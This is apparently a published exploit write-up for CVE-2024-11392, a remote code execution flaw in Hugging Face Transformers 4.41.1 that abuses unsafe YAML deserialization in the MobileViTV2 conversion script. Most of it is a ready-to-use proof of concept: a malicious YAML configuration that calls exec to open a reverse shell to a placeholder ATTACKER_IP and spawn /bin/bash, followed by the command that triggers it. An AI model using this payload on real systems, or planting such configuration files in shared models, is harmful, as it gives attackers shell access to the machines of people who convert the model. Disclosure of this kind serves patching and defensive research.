# Exploit Title: Hugging Face Transformers MobileViTV2 RCE # Date: 29-11-2024 # Exploit Author: The Kernel Panic # Vendor Homepage: https://huggingface.co/ # Software Link: https://github.com/huggingface/transformers/releases # Version: 4.41.1 # Tested on: Linux, Windows, Mac # CVE : CVE-2024-11392 # Code flow from input to the vulnerable condition: # 1. The user downloads a third-party ml-cvnet model alongside its configuration file. # 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it. # 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code. # POC # Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below. # Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'. !!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')" # Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path > python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or # Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script.